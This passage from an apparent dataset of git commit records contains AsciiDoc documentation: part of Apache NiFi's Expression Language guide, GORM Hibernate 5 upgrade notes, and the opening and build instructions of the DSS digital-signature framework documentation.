syntax.#\n\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the attribute \"year\" has the value \"2014\" and the attribute \"time\" has the value \"2014\/12\/31 15:36:03.264Z\",\n\tthen the Expression `${year:toDate('yyyy')}` will return the number of milliseconds between Midnight GMT on January 1, 1970\n\tand Midnight GMT on January 1, 2014. The Expression `${time:toDate(\"yyyy\/MM\/dd HH:mm:ss.SSS'Z'\")}` will result in the\n\tnumber of milliseconds between Midnight GMT on January 1, 1970 and 15:36:03.264 GMT on December 31, 2014.\n\t\n\tOften, this function is used in conjunction with the <<format>> function to change the format of a date\/time. 
For example,\n\tif the attribute \"date\" has the value \"12-24-2014\" and we want to change the format to \"2014\/12\/24\", we can do so by\n\tchaining together the two functions: `${date:toDate('MM-dd-yyyy'):format('yyyy\/MM\/dd')}`.\n\n\n\n\n[.function]\n=== now\n\n*Description*: [.description]#The `now` function returns the current date and time as the number of milliseconds since Midnight GMT on\n\tJanuary 1, 1970.#\n\n*Subject Type*: [.subject]#No Subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: We can format the current date and time by using the `now` function in conjunction with the <<format>> function:\n\t`${now():format('yyyy\/MM\/dd HH:mm:ss')}`.\n\n\n\n\n\n[[type_cast]]\n== Type Coercion\n\n[.function]\n=== toString\n\n*Description*: [.description]#Coerces the Subject into a String#\n\n*Subject Type*: [.subject]#Any type#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: The Expression `${fileSize:toNumber():toString()}` converts the value of \"fileSize\" attribute to a number and\n\tback to a String.\n\n\n\n\n\n[.function]\n=== toNumber\n\n*Description*: [.description]#Coerces the Subject into a Number#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: The Expression `${fileSize:toNumber()}` converts the String attribute value of \"fileSize\" to a number.\n\n\n\n\n\n\n[[subjectless]]\n== Subjectless Functions\n\nWhile the majority of functions in the Expression Language are called by using the syntax\n`${attributeName:function()}`, there exist a few functions that are not expected to have subjects.\nIn this case, the attribute name is not present. For example, the IP address of the machine can\nbe obtained by using the Expression `${ip()}`. All of the functions in this section are to be called\nwithout a subject. Attempting to call a subjectless function and provide it a subject will result in\nan error when validating the function.\n\n\n[.function]\n=== ip\n\n*Description*: [.description]#Returns the IP address of the machine.#\n\n*Subject Type*: [.subjectless]#No subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: The IP address of the machine can be obtained by using the Expression `${ip()}`.\n\n\n\n\n\n[.function]\n=== hostname\n\n*Description*: [.description]#Returns the Hostname of the machine. An optional argument of type Boolean can be provided\n\tto specify whether or not the Fully Qualified Domain Name should be used. If `false`, or not specified,\n\tthe hostname will not be fully qualified. If the argument is `true` but the fully qualified hostname\n\tcannot be resolved, the simple hostname will be returned.#\n\n*Subject Type*: [.subjectless]#No subject#\n\n*Arguments*:\n\n\t- [.argName]#_Fully Qualified_# : [.argDesc]#Optional parameter that specifies whether or not the hostname should be\n\t\tfully qualified. 
If not specified, defaults to false.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: The fully qualified hostname of the machine can be obtained by using the Expression `${hostname(true)}`,\n\twhile the simple hostname can be obtained by using either `${hostname(false)}` or simply `${hostname()}`.\n\n\n\n\n\n[.function]\n=== UUID\n\n*Description*: [.description]#Returns a randomly generated UUID.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: `${UUID()}` returns a value similar to `de305d54-75b4-431b-adb2-eb6b9e546013`\n\n\n\n\n\n[.function]\n=== nextInt\n\n*Description*: [.description]#Returns a one-up value (starting at 0) and increasing over the lifetime of the running instance of NiFi. \n\tThis value is not persisted across restarts and is not guaranteed to be unique across a cluster. \n\tThis value is considered \"one-up\" in that if called multiple times across the NiFi instance, the values will be sequential. \n\tHowever, this counter is shared across all NiFi components, so calling this function multiple times from one Processor will \n\tnot guarantee sequential values within the context of a particular Processor.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the previous value returned by `nextInt` was `5`, the Expression `${nextInt():divide(2)}` obtains the next available \n\tinteger (6) and divides the result by 2, returning a value of `3`.\n\n\n\n\n\n\n[[multi]]\n== Evaluating Multiple Attributes\n\nWhen it becomes necessary to evaluate the same conditions against multiple attributes, this can be accomplished by means of the \n`and` and `or` functions. However, this quickly becomes tedious, error-prone, and difficult to maintain. For this reason, NiFi\nprovides several functions for evaluating the same conditions against groups of attributes at the same time.\n\n\n\n\n[.function]\n=== anyAttribute\n \n*Description*: [.description]#Checks to see if any of the given attributes match the given condition. This function has no subject and takes one or more\n\targuments that are the names of attributes to which the remainder of the Expression is to be applied. If any of the attributes specified,\n\twhen evaluated against the rest of the Expression, returns a value of `true`, then this function will return `true`. Otherwise, this function\n\twill return `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Attribute Names_# : [.argDesc]#One or more attribute names to evaluate#\n\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\", \n\tand \"filename\" contains \"file.txt\" consider the following examples:\n\n.anyAttribute Examples\n|=======================================================================\n| Expression | Value\n| `${anyAttribute(\"abc\", \"xyz\"):contains(\"bye\")}` | `true`\n| `${anyAttribute(\"filename\",\"xyz\"):toUpper():contains(\"e\")}` | `false`\n|=======================================================================\n\n\n\n\n[.function]\n=== allAttributes\n\n*Description*: [.description]#Checks to see if all of the given attributes match the given condition. This function has no subject and takes one or more\n\targuments that are the names of attributes to which the remainder of the Expression is to be applied. 
If all of the attributes specified,\n\twhen evaluated against the rest of the Expression, return a value of `true`, then this function will return `true`. Otherwise, this function\n\twill return `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*: \n\n\t- [.argName]#_Attribute Names_# : [.argDesc]#One or more attribute names to evaluate#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\", \n\tand \"filename\" contains \"file.txt\" consider the following examples:\n\n.allAttributes Example\n|=============================================================================\n| Expression | Value\n| `${allAttributes(\"abc\", \"xyz\"):contains(\"world\")}` | `true`\n| `${allAttributes(\"abc\", \"filename\",\"xyz\"):toUpper():contains(\"e\")}` | `false`\n|=============================================================================\n\n\n\n\n\n[.function]\n=== anyMatchingAttribute\n\n*Description*: [.description]#Checks to see if any of the given attributes match the given condition. This function has no subject and takes one or more\n\targuments that are Regular Expressions to match against attribute names. Any attribute whose name matches one of the supplied\n\tRegular Expressions will be evaluated against the rest of the Expression. If any of the attributes specified,\n\twhen evaluated against the rest of the Expression, returns a value of `true`, then this function will return `true`. Otherwise, this function\n\twill return `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#One or more Regular Expressions (in the Java Pattern syntax) to evaluate against attribute names#\n\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\", \n\tand \"filename\" contains \"file.txt\" consider the following examples:\n\n.anyMatchingAttribute Example\n|==============================================================\n| Expression | Value\n| `${anyMatchingAttribute(\"[ax].*\"):contains('bye')}` | `true`\n| `${anyMatchingAttribute(\".*\"):isNull()}` | `false`\n|==============================================================\n\n\n\n\n\n[.function]\n=== allMatchingAttributes\n\n*Description*: [.description]#Checks to see if all of the given attributes match the given condition. This function has no subject and takes one or more\n\targuments that are Regular Expressions to match against attribute names. Any attribute whose name matches one of the supplied\n\tRegular Expressions will be evaluated against the rest of the Expression. If all of the attributes specified,\n\twhen evaluated against the rest of the Expression, return a value of `true`, then this function will return `true`. 
Otherwise, this function\n\twill return `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#One or more Regular Expressions (in the Java Pattern syntax) to evaluate against attribute names#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\", \n\tand \"filename\" contains \"file.txt\" consider the following examples:\n\n.allMatchingAttributes Examples\n|==============================================================\n| Expression | Value\n| `${allMatchingAttributes(\"[ax].*\"):contains(\"world\")}` | `true`\n| `${allMatchingAttributes(\".*\"):isNull()}` | `false`\n| `${allMatchingAttributes(\"f.*\"):count()}` | `1`\n|==============================================================\n\n\n\n\n\n[.function]\n=== anyDelineatedValue\n\n*Description*: [.description]#Splits a String apart according to a delimiter that is provided, and then evaluates each of the values against\n\tthe rest of the Expression. If the Expression, when evaluated against any of the individual values, returns `true`, this\n\tfunction returns `true`. Otherwise, the function returns `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Delineated Value_# : [.argDesc]#The value that is delineated. This is generally an embedded Expression, \n\t\tthough it does not have to be.#\n\t- [.argName]#_Delimiter_# : [.argDesc]#The value to use to split apart the _delineatedValue_ argument.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"number_list\" attribute contains the value \"1,2,3,4,5\", and the \"word_list\" attribute contains the value \"the,and,or,not\", \n\tconsider the following examples:\n\n.anyDelineatedValue Examples\n|===============================================================================\n| Expression | Value\n| `${anyDelineatedValue(\"${number_list}\", \",\"):contains(\"5\")}` | `true`\n| `${anyDelineatedValue(\"this that and\", \",\"):equals(\"${word_list}\")}` | `false`\n|===============================================================================\n\n\n\n[.function]\n=== allDelineatedValues\n\n*Description*: [.description]#Splits a String apart according to a delimiter that is provided, and then evaluates each of the values against\n\tthe rest of the Expression. If the Expression, when evaluated against all of the individual values, returns `true` in each\n\tcase, then this function returns `true`. Otherwise, the function returns `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Delineated Value_# : [.argDesc]#The value that is delineated. 
This is generally \n\t\tan embedded Expression, though it does not have to be.#\n\n\t- [.argName]#_Delimiter_# : [.argDesc]#The value to use to split apart the _delineatedValue_ argument.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"number_list\" attribute contains the value \"1,2,3,4,5\", and the \"word_list\" attribute contains the value \"those,known,or,not\", \n\tconsider the following examples:\n\n.allDelineatedValues Examples\n|===============================================================================\n| Expression | Value\n| `${allDelineatedValues(\"${word_list}\", \",\"):contains(\"o\")}` | `true`\n| `${allDelineatedValues(\"${number_list}\", \",\"):count()}` | `5`\n| `${allDelineatedValues(\"${number_list}\", \",\"):matches(\"[0-9]+\")}` | `true`\n| `${allDelineatedValues(\"${word_list}\", \",\"):matches('e')}` | `false`\n|===============================================================================\n\n\n\n\n[.function]\n=== join\n\n*Description*: [.description]#Aggregate function that concatenates multiple values with the specified delimiter. This function \n\tmay be used only in conjunction with the `allAttributes`, `allMatchingAttributes`, and `allDelineatedValues`\n\tfunctions.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Delimiter_# : [.argDesc]#The String delimiter to use when joining values#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\", \n\tand \"filename\" contains \"file.txt\" consider the following examples:\n\n.join Examples\n|=======================================================================================\n| Expression | Value\n| `${allMatchingAttributes(\"[ax].*\"):substringBefore(\" \"):join(\"-\")}` | `hello-good`\n| `${allAttributes(\"abc\", \"xyz\"):join(\" now\")}` | `hello world nowgood bye world`\n|=======================================================================================\n\n\n\n\n\n\n[.function]\n=== count\n\n*Description*: [.description]#Aggregate function that counts the number of non-null, non-false values returned by the \n\t`allAttributes`, `allMatchingAttributes`, and `allDelineatedValues` functions. 
This function \n\tmay be used only in conjunction with the `allAttributes`, `allMatchingAttributes`, and `allDelineatedValues`\n\tfunctions.#\n\n*Subject Type*: [.subject]#Any#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\", \n\tand \"number_list\" contains \"1,2,3,4,5\" consider the following examples:\n\n.count Examples\n|===========================================================================\n| Expression | Value\n| `${allMatchingAttributes(\"[ax].*\"):substringBefore(\" \"):count()}` | `2`\n| `${allAttributes(\"abc\", \"xyz\"):contains(\"world\"):count()}` | `2`\n| `${allDelineatedValues(${number_list}, \",\"):count()}` | `5`\n| `${allAttributes(\"abc\", \"non-existent-attr\", \"xyz\"):count()}` | `2`\n| `${allMatchingAttributes(\".*\"):length():gt(10):count()}` | `2`\n|===========================================================================\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9301137736e9426263d2fb3d9b9689b02de515de","subject":"upgrade docs","message":"upgrade docs\n","repos":"grails\/gorm-hibernate5","old_file":"docs\/src\/docs\/asciidoc\/introduction\/upgradeNotes.adoc","new_file":"docs\/src\/docs\/asciidoc\/introduction\/upgradeNotes.adoc","new_contents":"==== Changes to Configuration Model\n\nIn preparation for Hibernate 5.2 support, the previous \"SessionFactoryBean\" notion has been removed. Now if you wish to customize `SessionFactory` creation you should instead register a custom `org.grails.orm.hibernate.connections.HibernateConnectionSourceFactory` in Spring.\n\n==== IdentityEnumType Handling Changed\n\nPrevious versions of GORM shipped with a `org.grails.orm.hibernate.cfg.IdentityEnumType` class for altering the handling of enums. In order to support different versions of Hibernate 5.x which feature different signatures for the `org.hibernate.usertype.UserType` interface this class has been removed.\n\nIf you wish to obtain the same functionality you need to change your `mapping` block to:\n\n[source,groovy]\n----\nstatic mapping = {\n myEnum enumType:\"identity\"\n}\n----\n\n==== Changes to Support Hibernate 5.2\n\nHibernate 5.2 includes many breaking API changes. In order to support Hibernate 5.2, several classes have been removed or rewritten, including:\n\n* `org.grails.orm.hibernate.proxy.GroovyAwareJavassistLazyInitializer`\n* `org.grails.orm.hibernate.proxy.GroovyAwareJavassistProxyFactory`\n* `org.grails.orm.hibernate.persister.entity.GroovyAwareJoinedSubclassEntityPersister`\n* `org.grails.orm.hibernate.persister.entity.GroovyAwareSingleTableEntityPersister`\n\nMost of these classes are considered internal; however, if you have extended or referenced these classes you may need to modify your code appropriately.\n\n==== Domain Autowiring Disabled by Default\n\nSpring autowiring of domain instances has been disabled by default because it represents a performance bottleneck. If you are autowiring services into your domain instances you will need to re-enable it using the `mapping` block:\n\n[source,groovy]\n----\nstatic mapping = {\n autowire true\n}\n----\n\nNote that if enabled, read performance will degrade.\n\n==== Field AccessType by Default\n\nPrevious versions of GORM used property access to read and write values to entities by default. In other words, the respective getters and setters were used when reflecting on the instances. 
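As a rough sketch of the difference (the `Person` class and its custom getter below are illustrative only and not part of GORM):\n\n[source,groovy]\n----\nclass Person {\n    String name\n\n    \/\/ Under property access, GORM invoked this getter when reading the value,\n    \/\/ so the data appeared upper-cased; under field access, the underlying\n    \/\/ field is read directly and this getter is bypassed.\n    String getName() { name?.toUpperCase() }\n}\n----\n\n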
GORM 6.1 uses field access by default instead, which means the field is used when reading and writing data via reflection to instances.\n\nIf you wish to continue to use property access this can be configured by altering the default mapping in your configuration:\n\n[source,groovy]\n----\nimport javax.persistence.*\ngrails.gorm.default.mapping = {\n '*'(accessType: AccessType.PROPERTY)\n}\n----","old_contents":"==== Changes to Configuration Model\n\nIn preparation for Hibernate 5.2 support the previous \"SessionFactoryBean\" notion has been removed. Now if you wish to customize `SessionFactory` creation you should instead register a custom `org.grails.orm.hibernate.connections.HibernateConnectionSourceFactory` in Spring.\n\n==== IdentityEnumType Handling Changed\n\nPrevious versions of GORM shipped with a `org.grails.orm.hibernate.cfg.IdentityEnumType` class for altering the handling of enums. In order to support different versions of Hibernate 5.x which feature different signatures for the `org.hibernate.usertype.UserType` interface this class has been removed.\n\nIf you wish to obtain the same functionality you need to change your `mapping` block to:\n\n[source,groovy]\n----\nstatic mapping = {\n myEnum enumType:\"identity\"\n}\n----\n\n==== Changes to Support Hibernate 5.2\n\nHibernate 5.2 includes many breaking API changes, in order to support Hibernate 5.2 several classes have been removed or rewritten. Including:\n\n* `org.grails.orm.hibernate.proxy.GroovyAwareJavassistLazyInitializer`\n* `org.grails.orm.hibernate.proxy.GroovyAwareJavassistProxyFactory`\n* `org.grails.orm.hibernate.persister.entity.GroovyAwareJoinedSubclassEntityPersister`\n* `org.grails.orm.hibernate.persister.entity.GroovyAwareSingleTableEntityPersister`\n\nMost of these classes are considered internal, however if you have extended or references these classes you may need to modify your code appropriately.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6d390f435cfe3aa248555f95740cffca28e53fcf","subject":"DSS-2468 - JDK 16 support - update documentation","message":"DSS-2468 - JDK 16 support - update documentation\n","repos":"esig\/dss,esig\/dss","old_file":"dss-cookbook\/src\/main\/asciidoc\/dss-documentation.adoc","new_file":"dss-cookbook\/src\/main\/asciidoc\/dss-documentation.adoc","new_contents":":toc: left\n:icons: font\n:icon-set: far\n= Digital Signature Service\n:description: Documentation of the open source project DSS (Digital Signature Service). This project allows producing\/validation of Advanced electronic signatures (AdES).\n:keywords: electronic signature, XAdES, CAdES, PAdES, ASiC, open source, validation\nversion : {dssVersion} - {docdate}\n\n== Introduction\n\n=== Purpose of the document\n\nThis document describes some examples of how to develop in Java using the DSS framework. The aim is to show to the developers, in a progressive manner, the different uses of the framework. It will familiarize them with the code step by step.\n\n=== Scope of the document\n\nThis document provides examples of code which allow easy handling of digital signatures. 
The examples are consistent with the Release {dssVersion} of DSS framework which can be downloaded via https:\/\/ec.europa.eu\/cefdigital\/wiki\/display\/CEFDIGITAL\/DSS+releases\n\nThree main features can be distinguished within the framework :\n\n * The digital signature;\n * The extension of a digital signature and;\n * The validation of a digital signature.\n \nOn a more detailed manner the following concepts and features are addressed in this document:\n \n * Formats of the signed documents: XML, JSON, PDF, DOC, TXT, ZIP...;\n * Packaging structures: enveloping, enveloped, detached and internally-detached;\n * Forms of digital signatures: XAdES, CAdES, PAdES, JAdES and ASiC-S\/ASiC-E;\n * Profiles associated to each form of the digital signature;\n * Trust management;\n * Revocation data handling (OCSP and CRL sources);\n * Certificate chain building;\n * Signature validation and validation policy;\n * Signature qualification;\n * Validation reports (Simple, Detailed, ETSI Validation report);\n * Management of signature tokens;\n * Validation of the signing certificate;\n * Timestamp creation;\n * Timestamp validation and qualification;\n * REST and SOAP webservices.\n\nThis is not an exhaustive list of all the possibilities offered by the framework and the proposed examples cover only the most useful features. However, to discover every detail of the operational principles of the framework, the JavaDoc is available within the source code.\n\nPlease note that the DSS framework is still under maintenance and new features will be released in the future.\n\n=== Abbreviations and Acronyms\n\n[cols=2]\n.Abbreviations and Acronyms\n|=======================\n|Code\t\t\t|Description\n|AdES\t\t\t|Advanced Electronic Signature\n|API\t\t\t|Application Programming Interface\n|ASiC\t\t\t|Associated Signature Containers\n|BB\t\t\t\t|Building Block (CEF)\n|CA\t\t\t\t|Certificate authority\n|CAdES\t\t\t|CMS Advanced Electronic Signatures\n|CD\t\t\t\t|Commission Decision\n|CEF\t\t\t|Connecting Europe Facility\n|CMS\t\t\t|Cryptographic Message Syntax\n|CRL\t\t\t|Certificate Revocation List\n|CSP\t\t\t|Core Service Platform (CEF)\n|CSP\t\t\t|Cryptographic Service Provider\n|DER\t\t\t|Distinguished Encoding Rules\n|DSA\t\t\t|Digital Signature Algorithm - an algorithm for public-key cryptography\n|DSI\t\t\t|Digital Service Infrastructure (CEF)\n|DSS\t\t\t|Digital Signature Service\n|EC\t\t\t\t|European Commission\n|eID\t\t\t|Electronic Identity Card\n|ESI\t\t\t|Electronic Signatures and Infrastructures\n|ETSI\t\t\t|European Telecommunications Standards Institute\n|EUPL\t\t\t|European Union Public License\n|FSF\t\t\t|Free Software Foundation\n|GS\t\t\t\t|Generic Service (CEF)\n|GUI\t\t\t|Graphical User Interface\n|HSM\t\t\t|Hardware Security Modules\n|HTTP\t\t\t|Hypertext Transfer Protocol\n|I18N\t\t\t|Internationalization\n|JAdES |JSON Advanced Electronic Signatures\n|Java EE\t\t|Java Enterprise Edition\n|JavaDoc\t\t|JavaDoc is developed by Sun Microsystems to create API documentation in HTML format from the comments in the source code. 
JavaDoc is an industrial standard for documenting Java classes.\n|JAXB\t\t\t|Java Architecture for XML Binding\n|JCA\t\t\t|Java Cryptographic Architecture\n|JCE\t\t\t|Java Cryptography Extension\n|JDBC\t\t\t|Java DataBase Connectivity\n|JWS\t\t\t|JSON Web Signatures\n|LGPL\t\t\t|Lesser General Public License\n|LOTL\t\t\t|List of Trusted List or List of the Lists\n|LSP\t\t\t|Large Scale Pilot\n|MIT\t\t\t|Massachusetts Institute of Technology\n|MOCCA\t\t\t|Austrian Modular Open Citizen Card Architecture; implemented in Java\n|MS \/ EUMS\t\t|Member State\n|MS CAPI\t\t|Microsoft Cryptographic Application Programming Interface\n|OCF\t\t\t|OEBPS Container Format\n|OCSP\t\t\t|Online Certificate Status Protocol\n|ODF\t\t\t|Open Document Format\n|ODT\t\t\t|Open Document Text\n|OEBPS\t\t\t|Open eBook Publication Structure\n|OID\t\t\t|Object Identifier\n|OOXML\t\t\t|Office Open XML\n|OSI\t\t\t|Open Source Initiative\n|OSS\t\t\t|Open Source Software\n|PAdES\t\t\t|PDF Advanced Electronic Signatures\n|PC\/SC\t\t\t|Personal computer\/Smart Card\n|PDF\t\t\t|Portable Document Format\n|PDFBox\t\t\t|Apache PDFBox - A Java PDF Library: http:\/\/pdfbox.apache.org\/\n|PKCS\t\t\t|Public Key Cryptographic Standards\n|PKCS#12\t\t|It defines a file format commonly used to store X.509 private key accompanying public key certificates, protected by symmetrical password\n|PKIX\t\t\t|Internet X.509 Public Key Infrastructure\n|RSA\t\t\t|Rivest Shamir Adleman - an algorithm for public-key cryptography\n|SCA\t\t\t|Signature Creation Application\n|SCD\t\t\t|Signature Creation Device\n|SME\t\t\t|Subject Matter Expert\n|SMO\t\t\t|Stakeholder Management Office (CEF)\n|SOAP\t\t\t|Simple Object Access Protocol\n|SSCD\t\t\t|Secure Signature-Creation Device\n|SVA\t\t\t|Signature Validation Application\n|TL\t\t\t\t|Trusted List\n|TLManager\t\t|Application for managing trusted lists.\n|TSA\t\t\t|Time Stamping Authority\n|TSL\t\t\t|Trust-service Status List\n|TSP\t\t\t|Time Stamp Protocol\n|TSP\t\t\t|Trusted Service Provider\n|TST\t\t\t|Time-Stamp Token\n|UCF\t\t\t|Universal Container Format\n|URI\t\t\t|Uniform Resource Identifier\n|WSDL\t\t\t|Web Services Description Language\n|WYSIWYS\t\t|What you see is what you sign\n|XAdES\t\t\t|XML Advanced Electronic Signatures\n|XML\t\t\t|Extensible Markup Language\n|ZIP\t\t\t|File format used for data compression and archiving\n|=======================\n\n=== References\n\n[%header,cols=4]\n.References\n|=======================\n|Ref.\t\t\t|Title\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t|Reference\t\t\t\t\t|Version\n|[[R01]]\tR01\t|ESI - XAdES digital signatures\t\t\t\t\t\t\t\t\t\t\t\t\t|ETSI EN 319 132 part 1-2\t|1.1.1\n|[[R02]]\tR02\t|ESI - CAdES digital signatures\t\t\t\t\t\t\t\t\t\t\t\t\t|ETSI EN 319 122 part 1-2\t|1.1.1\n|[[R03]]\tR03\t|ESI - PAdES digital signatures\t\t\t\t\t\t\t\t\t\t\t\t\t|ETSI EN 319 142 part 1-2\t|1.1.1\n|[[R04]]\tR04\t|ESI - Associated Signature Containers (ASiC)\t\t\t\t\t\t\t\t\t|ETSI EN 319 162 part 1-2\t|1.1.1\n|[[R05]]\tR05\t|ESI - JAdES digital signatures\t\t\t\t\t\t\t\t\t\t\t\t\t|ETSI TS 119 182 part 1 \t|draft 0.0.6\n|[[R06]]\tR06\t|Document management - Portable document format - Part 1: PDF 1.7\t\t\t\t|ISO 32000-1\t\t\t\t|1\n|[[R07]]\tR07\t|Directive 1999\/93\/EC of the European Parliament and of the Council of 13 December 1999 on a Community framework for electronic signatures.\t|DIRECTIVE 1999\/93\/EC\t|\n|[[R08]]\tR08\t|Internet X.509 Public Key Infrastructure - Time-Stamp Protocol (TSP)\t\t\t|RFC 3161\t\t\t\t\t|\n|[[R09]]\tR09\t|ESI - Procedures for 
Creation and Validation of AdES Digital Signatures\t\t|ETSI EN 319 102-1\t\t\t|1.1.1\n|[[R10]]\tR10\t|ESI - Signature validation policy for European qualified electronic signatures\/seals using trusted lists |ETSI TS 119 172-4\t\t\t|draft\n|[[R11]]\tR11\t|ESI - Trusted Lists\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t|ETSI TS 119 612\t\t |2.1.1\n|[[R12]]\tR12\t|eIDAS Regulation No 910\/2014\t\t\t\t\t\t\t\t\t\t\t\t\t|910\/2014\/EU\t\t\t |\n|[[R13]]\tR13\t|ESI - Procedures for Creation and Validation of AdES Digital Signatures\t\t|ETSI TS 119 102-2\t\t |1.2.1\n|[[R14]]\tR14\t|ESI - Procedures for using and interpreting EU Member States national trusted lists\t\t\t\t\t\t|ETSI TS 119 615\t\t |draft\n\n|=======================\n\n=== Useful links\n\n * https:\/\/ec.europa.eu\/cefdigital\/wiki\/display\/CEFDIGITAL\/eSignature[CEF Digital]\n * https:\/\/ec.europa.eu\/cefdigital\/wiki\/display\/CEFDIGITAL\/eSignature+FAQ[eSignature FAQ]\n * https:\/\/webgate.ec.europa.eu\/tl-browser\/#\/[TL Browser]\n * https:\/\/ec.europa.eu\/cefdigital\/wiki\/display\/CEFDIGITAL\/eSignature+validation+tests[eSignature validation tests]\n * https:\/\/ec.europa.eu\/cefdigital\/wiki\/display\/TLSO\/Trusted+List+Manager+non-EU[Trusted List Manager non-EU]\n * https:\/\/github.com\/esig\/dss[Source code (GitHub)]\n * https:\/\/ec.europa.eu\/cefdigital\/code\/projects\/ESIG\/repos\/dss\/browse[Source code (EC Bitbucket)]\n * https:\/\/ec.europa.eu\/cefdigital\/code\/projects\/ESIG\/repos\/dss-demos\/browse[Source code demonstrations (EC Bitbucket)]\n * https:\/\/ec.europa.eu\/cefdigital\/tracker\/projects\/DSS\/issues[Report an issue (EC Jira)]\n * https:\/\/esig-dss.atlassian.net\/projects\/DSS[Old Jira] \n\n== Build instructions\n\nThis section explains the basic steps required to successfully build the DSS components.\n\n=== DSS Core\n\nThis section explains the build and usage requirements for the https:\/\/github.com\/esig\/dss[DSS framework].\n\n==== Requirements\n\nThe latest version of the DSS framework has the following minimal requirements:\n\n * Java 9 or higher (tested up to Java 16) is required for the build; for usage, Java 8 is the minimum requirement;\n * Maven 3.6 and higher;\n * Memory and Disk: see minimal requirements for the used JVM. 
In general, the more resources are available, the better;\n * Operating system: no specific requirements (tested on Windows and Linux).\n \nNOTE: We strongly recommend using the latest available version of the JDK, in order to have the latest security fixes and cryptographic algorithm updates.\n\nWARNING: Before starting the build, please ensure that Maven and a JVM of a required version have been successfully installed.\n\n==== Adding as Maven dependency\n\nThe simplest way to include DSS in your Maven project is to add the repository to the pom.xml file in the root directory of your project as follows:\n\n[source,xml]\n----\n<repositories>\n\t...\n\n\t<repository>\n\t <id>cefdigital<\/id>\n\t <name>cefdigital<\/name>\n\t <url>https:\/\/ec.europa.eu\/cefdigital\/artifact\/content\/repositories\/esignaturedss\/<\/url>\n\t<\/repository>\n<\/repositories>\n----\n\nAfter that, specify the list of dependencies required for your project.\n\nRefresh your project in order to download the dependencies; after that you will be able to use all modules of the DSS framework.\n\n==== Maven build and profiles\n\nIn order to use a customized bundle of DSS, you may want to build the DSS Core framework modules.\n\nNOTE: If you have implemented a new feature or fixed a bug, your pull requests are welcome at our https:\/\/github.com\/esig\/dss[GitHub Repository]\n\nA simple build of the DSS Maven project can be done with the following command:\n\n----\nmvn clean install\n----\n\nNOTE: All listed commands must be executed from the project directory via a Command Line Interface (CLI).\n\nThis installation will run all unit tests present in the modules, so a complete build can take more than one hour.\n\nIn addition to the general build, the framework provides a list of custom profiles, allowing a customized behavior:\n\n * quick - disables unit tests and the java-doc check, in order to process the build as quickly as possible (takes 2-3 minutes).\n * slow-tests - executes all tests, including time-consuming unit tests.\n * owasp - validates the project and the used dependencies against the https:\/\/nvd.nist.gov[National Vulnerability Database (NVD)].\n * jdk19-plus - executed automatically for JDK version 9 and higher; provides support for newer JDK versions on top of the JDK 8 baseline.\n * spotless - used to add a licence header into project files.\n\nWARNING: Some modules (e.g. `dss-utils`, `dss-crl-parser`, etc., see below) still have to be built completely when using the `quick` profile.\n \nIn order to run a build with a specific profile, the following command must be executed:\n\n----\nmvn clean install -P *profile_name*\n----\n\n==== Specific modules\n\nSome modules of the DSS framework have a specific behavior and need to be handled accordingly.\n\nDSS contains a bundle of JAXB-based modules, generating Java classes at runtime based on XSD schemas. When any change is made in the XSD, the classes of the module are re-generated accordingly. The following modules represent this behavior:\n\n * specs-xmldsig;\n * specs-xades;\n * specs-trusted-list;\n * specs-validation-report;\n * specs-asic-manifest;\n * specs-saml-assertion;\n * dss-policy-jaxb;\n * dss-diagnostic-jaxb;\n * dss-detailed-report-jaxb;\n * dss-simple-report-jaxb;\n * dss-simple-certificate-report-jaxb.\n\nSpecific modules with JWS and JAdES specifications exist. 
